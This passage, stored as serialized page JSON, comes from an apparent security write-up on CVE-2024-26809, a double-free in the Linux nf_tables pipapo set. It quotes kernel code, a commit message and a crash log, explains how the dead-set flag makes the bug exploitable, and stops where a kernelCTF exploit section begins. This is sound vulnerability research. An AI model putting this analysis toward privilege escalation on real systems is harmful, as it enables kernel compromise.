",{"type":27,"tag":84,"props":60420,"children":60422},{"className":60421},[],[60423],{"type":33,"value":58258},{"type":33,"value":59575},{"type":27,"tag":84,"props":60426,"children":60428},{"className":60427},[],[60429],{"type":33,"value":59589},{"type":33,"value":60431}," method.",{"type":27,"tag":101,"props":60433,"children":60435},{"className":23789,"code":60434,"language":10435,"meta":7,"style":7},"static void nf_tables_commit_release(struct net *net)\n{\n[...]\n schedule_work(&trans_destroy_work);\n[...]\n}\n[...]\nstatic void nf_tables_trans_destroy_work(struct work_struct *w)\n{\n[...]\n list_for_each_entry_safe(trans, next, &head, list) {\n nft_trans_list_del(trans);\n nft_commit_release(trans);\n }\n}\n[...]\nstatic void nft_commit_release(struct nft_trans *trans)\n{\n switch (trans->msg_type) {\n[...]\n case NFT_MSG_DELSET:\n case NFT_MSG_DESTROYSET:\n nft_set_destroy(&trans->ctx, nft_trans_set(trans));\n[...]\n}\n[...]\nstatic void nft_set_destroy(const struct nft_ctx *ctx, struct nft_set *set)\n{\n[...]\n set->ops->destroy(ctx, set);\n[...]\n}\n",[60436],{"type":27,"tag":84,"props":60437,"children":60438},{"__ignoreMap":7},[60439,60478,60485,60492,60513,60520,60527,60534,60575,60582,60589,60610,60623,60635,60642,60649,60656,60697,60704,60732,60739,60752,60764,60805,60812,60819,60826,60884,60891,60898,60927,60934],{"type":27,"tag":207,"props":60440,"children":60441},{"class":209,"line":210},[60442,60446,60450,60454,60458,60462,60466,60470,60474],{"type":27,"tag":207,"props":60443,"children":60444},{"style":214},[60445],{"type":33,"value":58283},{"type":27,"tag":207,"props":60447,"children":60448},{"style":214},[60449],{"type":33,"value":58288},{"type":27,"tag":207,"props":60451,"children":60452},{"style":1335},[60453],{"type":33,"value":60082},{"type":27,"tag":207,"props":60455,"children":60456},{"style":238},[60457],{"type":33,"value":1343},{"type":27,"tag":207,"props":60459,"children":60460},{"style":214},[60461],{"type":33,"value":16677},{"type":27,"tag":207,"props":60463,"children":60464},{"style":238},[60465],{"type":33,"value":59238},{"type":27,"tag":207,"props":60467,"children":60468},{"style":226},[60469],{"type":33,"value":9286},{"type":27,"tag":207,"props":60471,"children":60472},{"style":220},[60473],{"type":33,"value":59247},{"type":27,"tag":207,"props":60475,"children":60476},{"style":238},[60477],{"type":33,"value":10449},{"type":27,"tag":207,"props":60479,"children":60480},{"class":209,"line":244},[60481],{"type":27,"tag":207,"props":60482,"children":60483},{"style":238},[60484],{"type":33,"value":18158},{"type":27,"tag":207,"props":60486,"children":60487},{"class":209,"line":270},[60488],{"type":27,"tag":207,"props":60489,"children":60490},{"style":238},[60491],{"type":33,"value":17595},{"type":27,"tag":207,"props":60493,"children":60494},{"class":209,"line":296},[60495,60500,60504,60508],{"type":27,"tag":207,"props":60496,"children":60497},{"style":1335},[60498],{"type":33,"value":60499}," schedule_work",{"type":27,"tag":207,"props":60501,"children":60502},{"style":238},[60503],{"type":33,"value":1343},{"type":27,"tag":207,"props":60505,"children":60506},{"style":226},[60507],{"type":33,"value":10398},{"type":27,"tag":207,"props":60509,"children":60510},{"style":238},[60511],{"type":33,"value":60512},"trans_destroy_work);\n",{"type":27,"tag":207,"props":60514,"children":60515},{"class":209,"line":445},[60516],{"type":27,"tag":207,"props":60517,"children":60518},{"style":238},[60519],{"type":33,"value":17595},{"type":27,"tag":207,"props":60521,"children":60522},{"class":209,"line":867},[60523],{"type":27,"tag":207,"props":60524,"children":60525},{"style":238},[60526],{"type":33,"value":451},{"type":27,"tag":207,"props":60528,"children":60529},{"class":209,"line":892},[60530],{"type":27,"tag":207,"props":60531,"children":60532},{"style":238},[60533],{"type":33,"value":17595},{"type":27,"tag":207,"props":60535,"children":60536},{"class":209,"line":1475},[60537,60541,60545,60550,60554,60558,60563,60567,60571],{"type":27,"tag":207,"props":60538,"children":60539},{"style":214},[60540],{"type":33,"value":58283},{"type":27,"tag":207,"props":60542,"children":60543},{"style":214},[60544],{"type":33,"value":58288},{"type":27,"tag":207,"props":60546,"children":60547},{"style":1335},[60548],{"type":33,"value":60549}," nf_tables_trans_destroy_work",{"type":27,"tag":207,"props":60551,"children":60552},{"style":238},[60553],{"type":33,"value":1343},{"type":27,"tag":207,"props":60555,"children":60556},{"style":214},[60557],{"type":33,"value":16677},{"type":27,"tag":207,"props":60559,"children":60560},{"style":238},[60561],{"type":33,"value":60562}," work_struct ",{"type":27,"tag":207,"props":60564,"children":60565},{"style":226},[60566],{"type":33,"value":9286},{"type":27,"tag":207,"props":60568,"children":60569},{"style":220},[60570],{"type":33,"value":56810},{"type":27,"tag":207,"props":60572,"children":60573},{"style":238},[60574],{"type":33,"value":10449},{"type":27,"tag":207,"props":60576,"children":60577},{"class":209,"line":2065},[60578],{"type":27,"tag":207,"props":60579,"children":60580},{"style":238},[60581],{"type":33,"value":18158},{"type":27,"tag":207,"props":60583,"children":60584},{"class":209,"line":2092},[60585],{"type":27,"tag":207,"props":60586,"children":60587},{"style":238},[60588],{"type":33,"value":17595},{"type":27,"tag":207,"props":60590,"children":60591},{"class":209,"line":2130},[60592,60596,60601,60605],{"type":27,"tag":207,"props":60593,"children":60594},{"style":1335},[60595],{"type":33,"value":60234},{"type":27,"tag":207,"props":60597,"children":60598},{"style":238},[60599],{"type":33,"value":60600},"(trans, next, ",{"type":27,"tag":207,"props":60602,"children":60603},{"style":226},[60604],{"type":33,"value":10398},{"type":27,"tag":207,"props":60606,"children":60607},{"style":238},[60608],{"type":33,"value":60609},"head, list) {\n",{"type":27,"tag":207,"props":60611,"children":60612},{"class":209,"line":2168},[60613,60618],{"type":27,"tag":207,"props":60614,"children":60615},{"style":1335},[60616],{"type":33,"value":60617}," nft_trans_list_del",{"type":27,"tag":207,"props":60619,"children":60620},{"style":238},[60621],{"type":33,"value":60622},"(trans);\n",{"type":27,"tag":207,"props":60624,"children":60625},{"class":209,"line":4095},[60626,60631],{"type":27,"tag":207,"props":60627,"children":60628},{"style":1335},[60629],{"type":33,"value":60630}," nft_commit_release",{"type":27,"tag":207,"props":60632,"children":60633},{"style":238},[60634],{"type":33,"value":60622},{"type":27,"tag":207,"props":60636,"children":60637},{"class":209,"line":4103},[60638],{"type":27,"tag":207,"props":60639,"children":60640},{"style":238},[60641],{"type":33,"value":16872},{"type":27,"tag":207,"props":60643,"children":60644},{"class":209,"line":4154},[60645],{"type":27,"tag":207,"props":60646,"children":60647},{"style":238},[60648],{"type":33,"value":451},{"type":27,"tag":207,"props":60650,"children":60651},{"class":209,"line":4203},[60652],{"type":27,"tag":207,"props":60653,"children":60654},{"style":238},[60655],{"type":33,"value":17595},{"type":27,"tag":207,"props":60657,"children":60658},{"class":209,"line":4249},[60659,60663,60667,60672,60676,60680,60685,60689,60693],{"type":27,"tag":207,"props":60660,"children":60661},{"style":214},[60662],{"type":33,"value":58283},{"type":27,"tag":207,"props":60664,"children":60665},{"style":214},[60666],{"type":33,"value":58288},{"type":27,"tag":207,"props":60668,"children":60669},{"style":1335},[60670],{"type":33,"value":60671}," nft_commit_release",{"type":27,"tag":207,"props":60673,"children":60674},{"style":238},[60675],{"type":33,"value":1343},{"type":27,"tag":207,"props":60677,"children":60678},{"style":214},[60679],{"type":33,"value":16677},{"type":27,"tag":207,"props":60681,"children":60682},{"style":238},[60683],{"type":33,"value":60684}," nft_trans ",{"type":27,"tag":207,"props":60686,"children":60687},{"style":226},[60688],{"type":33,"value":9286},{"type":27,"tag":207,"props":60690,"children":60691},{"style":220},[60692],{"type":33,"value":59797},{"type":27,"tag":207,"props":60694,"children":60695},{"style":238},[60696],{"type":33,"value":10449},{"type":27,"tag":207,"props":60698,"children":60699},{"class":209,"line":4290},[60700],{"type":27,"tag":207,"props":60701,"children":60702},{"style":238},[60703],{"type":33,"value":18158},{"type":27,"tag":207,"props":60705,"children":60706},{"class":209,"line":4304},[60707,60712,60716,60720,60724,60728],{"type":27,"tag":207,"props":60708,"children":60709},{"style":376},[60710],{"type":33,"value":60711}," switch",{"type":27,"tag":207,"props":60713,"children":60714},{"style":238},[60715],{"type":33,"value":686},{"type":27,"tag":207,"props":60717,"children":60718},{"style":220},[60719],{"type":33,"value":59797},{"type":27,"tag":207,"props":60721,"children":60722},{"style":238},[60723],{"type":33,"value":8968},{"type":27,"tag":207,"props":60725,"children":60726},{"style":220},[60727],{"type":33,"value":59835},{"type":27,"tag":207,"props":60729,"children":60730},{"style":238},[60731],{"type":33,"value":1424},{"type":27,"tag":207,"props":60733,"children":60734},{"class":209,"line":5466},[60735],{"type":27,"tag":207,"props":60736,"children":60737},{"style":238},[60738],{"type":33,"value":17595},{"type":27,"tag":207,"props":60740,"children":60741},{"class":209,"line":5530},[60742,60747],{"type":27,"tag":207,"props":60743,"children":60744},{"style":376},[60745],{"type":33,"value":60746}," case",{"type":27,"tag":207,"props":60748,"children":60749},{"style":238},[60750],{"type":33,"value":60751}," NFT_MSG_DELSET:\n",{"type":27,"tag":207,"props":60753,"children":60754},{"class":209,"line":7900},[60755,60759],{"type":27,"tag":207,"props":60756,"children":60757},{"style":376},[60758],{"type":33,"value":60746},{"type":27,"tag":207,"props":60760,"children":60761},{"style":238},[60762],{"type":33,"value":60763}," NFT_MSG_DESTROYSET:\n",{"type":27,"tag":207,"props":60765,"children":60766},{"class":209,"line":7909},[60767,60772,60776,60780,60784,60788,60792,60796,60800],{"type":27,"tag":207,"props":60768,"children":60769},{"style":1335},[60770],{"type":33,"value":60771}," nft_set_destroy",{"type":27,"tag":207,"props":60773,"children":60774},{"style":238},[60775],{"type":33,"value":1343},{"type":27,"tag":207,"props":60777,"children":60778},{"style":226},[60779],{"type":33,"value":10398},{"type":27,"tag":207,"props":60781,"children":60782},{"style":238},[60783],{"type":33,"value":59797},{"type":27,"tag":207,"props":60785,"children":60786},{"style":226},[60787],{"type":33,"value":8968},{"type":27,"tag":207,"props":60789,"children":60790},{"style":220},[60791],{"type":33,"value":27552},{"type":27,"tag":207,"props":60793,"children":60794},{"style":238},[60795],{"type":33,"value":1123},{"type":27,"tag":207,"props":60797,"children":60798},{"style":1335},[60799],{"type":33,"value":59763},{"type":27,"tag":207,"props":60801,"children":60802},{"style":238},[60803],{"type":33,"value":60804},"(trans));\n",{"type":27,"tag":207,"props":60806,"children":60807},{"class":209,"line":7917},[60808],{"type":27,"tag":207,"props":60809,"children":60810},{"style":238},[60811],{"type":33,"value":17595},{"type":27,"tag":207,"props":60813,"children":60814},{"class":209,"line":7926},[60815],{"type":27,"tag":207,"props":60816,"children":60817},{"style":238},[60818],{"type":33,"value":451},{"type":27,"tag":207,"props":60820,"children":60821},{"class":209,"line":7934},[60822],{"type":27,"tag":207,"props":60823,"children":60824},{"style":238},[60825],{"type":33,"value":17595},{"type":27,"tag":207,"props":60827,"children":60828},{"class":209,"line":7943},[60829,60833,60837,60842,60846,60850,60854,60858,60862,60867,60871,60875,60879],{"type":27,"tag":207,"props":60830,"children":60831},{"style":214},[60832],{"type":33,"value":58283},{"type":27,"tag":207,"props":60834,"children":60835},{"style":214},[60836],{"type":33,"value":58288},{"type":27,"tag":207,"props":60838,"children":60839},{"style":1335},[60840],{"type":33,"value":60841}," nft_set_destroy",{"type":27,"tag":207,"props":60843,"children":60844},{"style":238},[60845],{"type":33,"value":1343},{"type":27,"tag":207,"props":60847,"children":60848},{"style":214},[60849],{"type":33,"value":16931},{"type":27,"tag":207,"props":60851,"children":60852},{"style":214},[60853],{"type":33,"value":28423},{"type":27,"tag":207,"props":60855,"children":60856},{"style":238},[60857],{"type":33,"value":58310},{"type":27,"tag":207,"props":60859,"children":60860},{"style":226},[60861],{"type":33,"value":9286},{"type":27,"tag":207,"props":60863,"children":60864},{"style":238},[60865],{"type":33,"value":60866},"ctx, ",{"type":27,"tag":207,"props":60868,"children":60869},{"style":214},[60870],{"type":33,"value":16677},{"type":27,"tag":207,"props":60872,"children":60873},{"style":238},[60874],{"type":33,"value":58338},{"type":27,"tag":207,"props":60876,"children":60877},{"style":226},[60878],{"type":33,"value":9286},{"type":27,"tag":207,"props":60880,"children":60881},{"style":238},[60882],{"type":33,"value":60883},"set)\n",{"type":27,"tag":207,"props":60885,"children":60886},{"class":209,"line":7952},[60887],{"type":27,"tag":207,"props":60888,"children":60889},{"style":238},[60890],{"type":33,"value":18158},{"type":27,"tag":207,"props":60892,"children":60893},{"class":209,"line":7961},[60894],{"type":27,"tag":207,"props":60895,"children":60896},{"style":238},[60897],{"type":33,"value":17595},{"type":27,"tag":207,"props":60899,"children":60900},{"class":209,"line":7969},[60901,60905,60909,60913,60917,60922],{"type":27,"tag":207,"props":60902,"children":60903},{"style":220},[60904],{"type":33,"value":60322},{"type":27,"tag":207,"props":60906,"children":60907},{"style":238},[60908],{"type":33,"value":8968},{"type":27,"tag":207,"props":60910,"children":60911},{"style":220},[60912],{"type":33,"value":59906},{"type":27,"tag":207,"props":60914,"children":60915},{"style":238},[60916],{"type":33,"value":8968},{"type":27,"tag":207,"props":60918,"children":60919},{"style":1335},[60920],{"type":33,"value":60921},"destroy",{"type":27,"tag":207,"props":60923,"children":60924},{"style":238},[60925],{"type":33,"value":60926},"(ctx, set);\n",{"type":27,"tag":207,"props":60928,"children":60929},{"class":209,"line":7978},[60930],{"type":27,"tag":207,"props":60931,"children":60932},{"style":238},[60933],{"type":33,"value":17595},{"type":27,"tag":207,"props":60935,"children":60936},{"class":209,"line":7987},[60937],{"type":27,"tag":207,"props":60938,"children":60939},{"style":238},[60940],{"type":33,"value":451},{"type":27,"tag":36,"props":60942,"children":60943},{},[60944,60946,60951,60953,60958,60960,60966,60968,60973,60975,60980,60982,60986,60988,60993,60994,60998,61000,61006],{"type":33,"value":60945},"It may appear as if it would be impossible to make ",{"type":27,"tag":84,"props":60947,"children":60949},{"className":60948},[],[60950],{"type":33,"value":58212},{"type":33,"value":60952}," true in the release step because the ",{"type":27,"tag":84,"props":60954,"children":60956},{"className":60955},[],[60957],{"type":33,"value":59581},{"type":33,"value":60959}," method is always invoked first...\nHowever, one last piece brings this bug to life: the ",{"type":27,"tag":84,"props":60961,"children":60963},{"className":60962},[],[60964],{"type":33,"value":60965},"set->dead",{"type":33,"value":60967}," flag. If a ",{"type":27,"tag":84,"props":60969,"children":60971},{"className":60970},[],[60972],{"type":33,"value":58258},{"type":33,"value":60974}," was marked for deletion, it receives the ",{"type":27,"tag":84,"props":60976,"children":60978},{"className":60977},[],[60979],{"type":33,"value":60965},{"type":33,"value":60981}," flag ",{"type":27,"tag":207,"props":60983,"children":60984},{},[60985],{"type":33,"value":1744},{"type":33,"value":60987},". If this flag is set, then the commit path will skip any commitments to this ",{"type":27,"tag":84,"props":60989,"children":60991},{"className":60990},[],[60992],{"type":33,"value":58258},{"type":33,"value":13740},{"type":27,"tag":207,"props":60995,"children":60996},{},[60997],{"type":33,"value":1693},{"type":33,"value":60999},". This is extremely convenient for us and will allow us to trigger the double-free because the ",{"type":27,"tag":84,"props":61001,"children":61003},{"className":61002},[],[61004],{"type":33,"value":61005},"priv ->dirty",{"type":33,"value":61007}," flag is not cleared when it should have been.",{"type":27,"tag":28,"props":61009,"children":61011},{"id":61010},"tracing-the-guilty-commit",[61012],{"type":33,"value":61013},"Tracing the guilty commit",{"type":27,"tag":36,"props":61015,"children":61016},{},[61017,61019,61026,61028,61034,61036,61041,61043,61049],{"type":33,"value":61018},"The above scenario raises some interesting suppositions about how this vulnerability was introduced. See, any ",{"type":27,"tag":47,"props":61020,"children":61023},{"href":61021,"rel":61022},"https://ubuntu.com/security/CVE-2024-26809",[51],[61024],{"type":33,"value":61025},"advisories",{"type":33,"value":61027}," about this vulnerability will say it was introduced by this ",{"type":27,"tag":47,"props":61029,"children":61032},{"href":61030,"rel":61031},"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9827a0e6e23bf43003cd3d5b7fb11baf59a35e1e",[51],[61033],{"type":33,"value":59915},{"type":33,"value":61035},", which sounds fair considering this added the weird code that frees twice in the same path. However, by checking the blame on the ",{"type":27,"tag":84,"props":61037,"children":61039},{"className":61038},[],[61040],{"type":33,"value":60965},{"type":33,"value":61042}," flag, which was what actually made this exploitable, we will learn that it was only introduced over a year after the commit above in this ",{"type":27,"tag":47,"props":61044,"children":61047},{"href":61045,"rel":61046},"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5f68718b34a531a556f2f50300ead2862278da26",[51],[61048],{"type":33,"value":59915},{"type":33,"value":1041},{"type":27,"tag":36,"props":61051,"children":61052},{},[61053],{"type":33,"value":61054},"By reading the message of the first commit, we can finally understand why this code was added:",{"type":27,"tag":101,"props":61056,"children":61060},{"className":61057,"code":61058,"language":61059,"meta":7,"style":7},"language-txt shiki shiki-themes slack-dark","New elements that reside in the clone are not released in case that the\ntransaction is aborted.\n\n[16302.231754] ------------[ cut here ]------------\n[16302.231756] WARNING: CPU: 0 PID: 100509 at net/netfilter/nf_tables_api.c:1864 nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n[...]\n[16302.231882] CPU: 0 PID: 100509 Comm: nft Tainted: G W 5.19.0-rc3+ #155\n[...]\n[16302.231887] RIP: 0010:nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n[16302.231899] Code: f3 fe ff ff 41 55 41 54 55 53 48 8b 6f 10 48 89 fb 48 c7 c7 82 96 d9 a0 8b 55 50 48 8b 75 58 e8 de f5 92 e0 83 7d 50 00 74 09 \u003C0f> 0b 5b 5d 41 5c 41 5d c3 4c 8b 65 00 48 8b 7d 08 49 39 fc 74 05\n[...]\n[16302.231917] Call Trace:\n[16302.231919] \u003CTASK>\n[16302.231921] __nf_tables_abort.cold+0x23/0x28 [nf_tables]\n[16302.231934] nf_tables_abort+0x30/0x50 [nf_tables]\n[16302.231946] nfnetlink_rcv_batch+0x41a/0x840 [nfnetlink]\n[16302.231952] ? __nla_validate_parse+0x48/0x190\n[16302.231959] nfnetlink_rcv+0x110/0x129 [nfnetlink]\n[16302.231963] netlink_unicast+0x211/0x340\n[16302.231969] netlink_sendmsg+0x21e/0x460\n\nAdd nft_set_pipapo_match_destroy() helper function to release the\nelements in the lookup tables.\n\nStefano Brivio says: \"We additionally look for elements pointers in the\ncloned matching data if priv->dirty is set, because that means that\ncloned data might point to additional elements we did not commit to the\nworking copy yet (such as the abort path case, but perhaps not limited\nto it).\"\n\nFixes: 3c4287f62044 (\"nf_tables: Add set type for arbitrary concatenation of ranges\")\nReviewed-by: Stefano Brivio \u003Csbrivio@redhat.com>\nSigned-off-by: Pablo Neira Ayuso \u003Cpablo@netfilter.org>\n","txt",[61061],{"type":27,"tag":84,"props":61062,"children":61063},{"__ignoreMap":7},[61064,61072,61080,61087,61095,61103,61110,61118,61125,61133,61141,61148,61156,61164,61172,61180,61188,61196,61204,61212,61220,61227,61235,61243,61250,61258,61266,61274,61282,61290,61297,61305,61313],{"type":27,"tag":207,"props":61065,"children":61066},{"class":209,"line":210},[61067],{"type":27,"tag":207,"props":61068,"children":61069},{},[61070],{"type":33,"value":61071},"New elements that reside in the clone are not released in case that the\n",{"type":27,"tag":207,"props":61073,"children":61074},{"class":209,"line":244},[61075],{"type":27,"tag":207,"props":61076,"children":61077},{},[61078],{"type":33,"value":61079},"transaction is aborted.\n",{"type":27,"tag":207,"props":61081,"children":61082},{"class":209,"line":270},[61083],{"type":27,"tag":207,"props":61084,"children":61085},{"emptyLinePlaceholder":19},[61086],{"type":33,"value":2062},{"type":27,"tag":207,"props":61088,"children":61089},{"class":209,"line":296},[61090],{"type":27,"tag":207,"props":61091,"children":61092},{},[61093],{"type":33,"value":61094},"[16302.231754] ------------[ cut here ]------------\n",{"type":27,"tag":207,"props":61096,"children":61097},{"class":209,"line":445},[61098],{"type":27,"tag":207,"props":61099,"children":61100},{},[61101],{"type":33,"value":61102},"[16302.231756] WARNING: CPU: 0 PID: 100509 at net/netfilter/nf_tables_api.c:1864 nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n",{"type":27,"tag":207,"props":61104,"children":61105},{"class":209,"line":867},[61106],{"type":27,"tag":207,"props":61107,"children":61108},{},[61109],{"type":33,"value":17595},{"type":27,"tag":207,"props":61111,"children":61112},{"class":209,"line":892},[61113],{"type":27,"tag":207,"props":61114,"children":61115},{},[61116],{"type":33,"value":61117},"[16302.231882] CPU: 0 PID: 100509 Comm: nft Tainted: G W 5.19.0-rc3+ #155\n",{"type":27,"tag":207,"props":61119,"children":61120},{"class":209,"line":1475},[61121],{"type":27,"tag":207,"props":61122,"children":61123},{},[61124],{"type":33,"value":17595},{"type":27,"tag":207,"props":61126,"children":61127},{"class":209,"line":2065},[61128],{"type":27,"tag":207,"props":61129,"children":61130},{},[61131],{"type":33,"value":61132},"[16302.231887] RIP: 0010:nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n",{"type":27,"tag":207,"props":61134,"children":61135},{"class":209,"line":2092},[61136],{"type":27,"tag":207,"props":61137,"children":61138},{},[61139],{"type":33,"value":61140},"[16302.231899] Code: f3 fe ff ff 41 55 41 54 55 53 48 8b 6f 10 48 89 fb 48 c7 c7 82 96 d9 a0 8b 55 50 48 8b 75 58 e8 de f5 92 e0 83 7d 50 00 74 09 \u003C0f> 0b 5b 5d 41 5c 41 5d c3 4c 8b 65 00 48 8b 7d 08 49 39 fc 74 05\n",{"type":27,"tag":207,"props":61142,"children":61143},{"class":209,"line":2130},[61144],{"type":27,"tag":207,"props":61145,"children":61146},{},[61147],{"type":33,"value":17595},{"type":27,"tag":207,"props":61149,"children":61150},{"class":209,"line":2168},[61151],{"type":27,"tag":207,"props":61152,"children":61153},{},[61154],{"type":33,"value":61155},"[16302.231917] Call Trace:\n",{"type":27,"tag":207,"props":61157,"children":61158},{"class":209,"line":4095},[61159],{"type":27,"tag":207,"props":61160,"children":61161},{},[61162],{"type":33,"value":61163},"[16302.231919] \u003CTASK>\n",{"type":27,"tag":207,"props":61165,"children":61166},{"class":209,"line":4103},[61167],{"type":27,"tag":207,"props":61168,"children":61169},{},[61170],{"type":33,"value":61171},"[16302.231921] __nf_tables_abort.cold+0x23/0x28 [nf_tables]\n",{"type":27,"tag":207,"props":61173,"children":61174},{"class":209,"line":4154},[61175],{"type":27,"tag":207,"props":61176,"children":61177},{},[61178],{"type":33,"value":61179},"[16302.231934] nf_tables_abort+0x30/0x50 [nf_tables]\n",{"type":27,"tag":207,"props":61181,"children":61182},{"class":209,"line":4203},[61183],{"type":27,"tag":207,"props":61184,"children":61185},{},[61186],{"type":33,"value":61187},"[16302.231946] nfnetlink_rcv_batch+0x41a/0x840 [nfnetlink]\n",{"type":27,"tag":207,"props":61189,"children":61190},{"class":209,"line":4249},[61191],{"type":27,"tag":207,"props":61192,"children":61193},{},[61194],{"type":33,"value":61195},"[16302.231952] ? __nla_validate_parse+0x48/0x190\n",{"type":27,"tag":207,"props":61197,"children":61198},{"class":209,"line":4290},[61199],{"type":27,"tag":207,"props":61200,"children":61201},{},[61202],{"type":33,"value":61203},"[16302.231959] nfnetlink_rcv+0x110/0x129 [nfnetlink]\n",{"type":27,"tag":207,"props":61205,"children":61206},{"class":209,"line":4304},[61207],{"type":27,"tag":207,"props":61208,"children":61209},{},[61210],{"type":33,"value":61211},"[16302.231963] netlink_unicast+0x211/0x340\n",{"type":27,"tag":207,"props":61213,"children":61214},{"class":209,"line":5466},[61215],{"type":27,"tag":207,"props":61216,"children":61217},{},[61218],{"type":33,"value":61219},"[16302.231969] netlink_sendmsg+0x21e/0x460\n",{"type":27,"tag":207,"props":61221,"children":61222},{"class":209,"line":5530},[61223],{"type":27,"tag":207,"props":61224,"children":61225},{"emptyLinePlaceholder":19},[61226],{"type":33,"value":2062},{"type":27,"tag":207,"props":61228,"children":61229},{"class":209,"line":7900},[61230],{"type":27,"tag":207,"props":61231,"children":61232},{},[61233],{"type":33,"value":61234},"Add nft_set_pipapo_match_destroy() helper function to release the\n",{"type":27,"tag":207,"props":61236,"children":61237},{"class":209,"line":7909},[61238],{"type":27,"tag":207,"props":61239,"children":61240},{},[61241],{"type":33,"value":61242},"elements in the lookup tables.\n",{"type":27,"tag":207,"props":61244,"children":61245},{"class":209,"line":7917},[61246],{"type":27,"tag":207,"props":61247,"children":61248},{"emptyLinePlaceholder":19},[61249],{"type":33,"value":2062},{"type":27,"tag":207,"props":61251,"children":61252},{"class":209,"line":7926},[61253],{"type":27,"tag":207,"props":61254,"children":61255},{},[61256],{"type":33,"value":61257},"Stefano Brivio says: \"We additionally look for elements pointers in the\n",{"type":27,"tag":207,"props":61259,"children":61260},{"class":209,"line":7934},[61261],{"type":27,"tag":207,"props":61262,"children":61263},{},[61264],{"type":33,"value":61265},"cloned matching data if priv->dirty is set, because that means that\n",{"type":27,"tag":207,"props":61267,"children":61268},{"class":209,"line":7943},[61269],{"type":27,"tag":207,"props":61270,"children":61271},{},[61272],{"type":33,"value":61273},"cloned data might point to additional elements we did not commit to the\n",{"type":27,"tag":207,"props":61275,"children":61276},{"class":209,"line":7952},[61277],{"type":27,"tag":207,"props":61278,"children":61279},{},[61280],{"type":33,"value":61281},"working copy yet (such as the abort path case, but perhaps not limited\n",{"type":27,"tag":207,"props":61283,"children":61284},{"class":209,"line":7961},[61285],{"type":27,"tag":207,"props":61286,"children":61287},{},[61288],{"type":33,"value":61289},"to it).\"\n",{"type":27,"tag":207,"props":61291,"children":61292},{"class":209,"line":7969},[61293],{"type":27,"tag":207,"props":61294,"children":61295},{"emptyLinePlaceholder":19},[61296],{"type":33,"value":2062},{"type":27,"tag":207,"props":61298,"children":61299},{"class":209,"line":7978},[61300],{"type":27,"tag":207,"props":61301,"children":61302},{},[61303],{"type":33,"value":61304},"Fixes: 3c4287f62044 (\"nf_tables: Add set type for arbitrary concatenation of ranges\")\n",{"type":27,"tag":207,"props":61306,"children":61307},{"class":209,"line":7987},[61308],{"type":27,"tag":207,"props":61309,"children":61310},{},[61311],{"type":33,"value":61312},"Reviewed-by: Stefano Brivio \u003Csbrivio@redhat.com>\n",{"type":27,"tag":207,"props":61314,"children":61315},{"class":209,"line":7996},[61316],{"type":27,"tag":207,"props":61317,"children":61318},{},[61319],{"type":33,"value":61320},"Signed-off-by: Pablo Neira Ayuso \u003Cpablo@netfilter.org>\n",{"type":27,"tag":36,"props":61322,"children":61323},{},[61324,61326,61331,61333,61338,61340,61345,61347,61352],{"type":33,"value":61325},"As we previously discussed, committing changes to a pipapo ",{"type":27,"tag":84,"props":61327,"children":61329},{"className":61328},[],[61330],{"type":33,"value":58258},{"type":33,"value":61332}," is implemented by creating a clone of the match object, to which changes are made during the control plane. Later, if we enter the commit path, the changes are committed in the ",{"type":27,"tag":84,"props":61334,"children":61336},{"className":61335},[],[61337],{"type":33,"value":59581},{"type":33,"value":61339}," method by simply replacing the ",{"type":27,"tag":84,"props":61341,"children":61343},{"className":61342},[],[61344],{"type":33,"value":58258},{"type":33,"value":61346},"s match object with its updated clone. So checking the ",{"type":27,"tag":84,"props":61348,"children":61350},{"className":61349},[],[61351],{"type":33,"value":58212},{"type":33,"value":61353}," flag and then calling free again ensures we also free uncommitted changes.",{"type":27,"tag":36,"props":61355,"children":61356},{},[61357,61359,61364],{"type":33,"value":61358},"This doesn't make sense in the commit path but only in the abort path. Evidently, when aborting the transaction that creates the ",{"type":27,"tag":84,"props":61360,"children":61362},{"className":61361},[],[61363],{"type":33,"value":58258},{"type":33,"value":61365},", there will be no committed changes, and there will only be the elements inside the clone, which will end up never being committed. So, to make sure we free these uncommitted elements, it's crucial to free what's in the clone.",{"type":27,"tag":36,"props":61367,"children":61368},{},[61369,61371,61377,61379,61384,61386,61391],{"type":33,"value":61370},"When this code was introduced, it was only reachable from the abort path because it was the only path where ",{"type":27,"tag":84,"props":61372,"children":61374},{"className":61373},[],[61375],{"type":33,"value":61376},"set->ops->destroy()",{"type":33,"value":61378}," could be called without clearing the ",{"type":27,"tag":84,"props":61380,"children":61382},{"className":61381},[],[61383],{"type":33,"value":58212},{"type":33,"value":61385}," flag, which was fine considering you didn't have duplicated views of the ",{"type":27,"tag":84,"props":61387,"children":61389},{"className":61388},[],[61390],{"type":33,"value":58250},{"type":33,"value":61392},"s, so they would all be in the clone set.",{"type":27,"tag":36,"props":61394,"children":61395},{},[61396,61398,61403],{"type":33,"value":61397},"But when the ",{"type":27,"tag":84,"props":61399,"children":61401},{"className":61400},[],[61402],{"type":33,"value":60965},{"type":33,"value":61404}," flag was introduced, some assumptions about the commit path were changed. It created a new way of reaching this code while having already committed changes in the set. This means any already committed changes will have a view in the \"normal\" match object and one in the clone.",{"type":27,"tag":36,"props":61406,"children":61407},{},[61408],{"type":33,"value":61409},"The vulnerability was fixed by only deleting elements from the clone because the clone should have all views of committed and uncommitted changes, effectively eliminating the double-free vulnerability.",{"type":27,"tag":28,"props":61411,"children":61413},{"id":61412},"kernelctf-exploit",[61414],{"type":33,"value":61415},"KernelCTF exploit",{"type":27,"tag":36,"props":61417,"children":61418},{},[61419,61421,61427,61429,61436],{"type":33,"value":61420},"Now that we know the full story of the bug, let's look into how I exploited it in the KernelCTF LTS instance before getting into the universal exploit. A great deal of the exploit is based on the ",{"type":27,"tag":84,"props":61422,"children":61424},{"className":61423},[],[61425],{"type":33,"value":61426},"nft_object + udata",{"type":33,"value":61428}," technique shared by lonial con in a ",{"type":27,"tag":47,"props":61430,"children":61433},{"href":61431,"rel":61432},"https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/exploit.md",[51],[61434],{"type":33,"value":61435},"previous kernelCTF exploit",{"type":33,"value":1041},{"type":27,"tag":58,"props":61438,"children":61440},{"id":61439},"trigger-uafavoid-double-free-detection",[61441],{"type":33,"value":61442},"Trigger UAF/avoid double-free 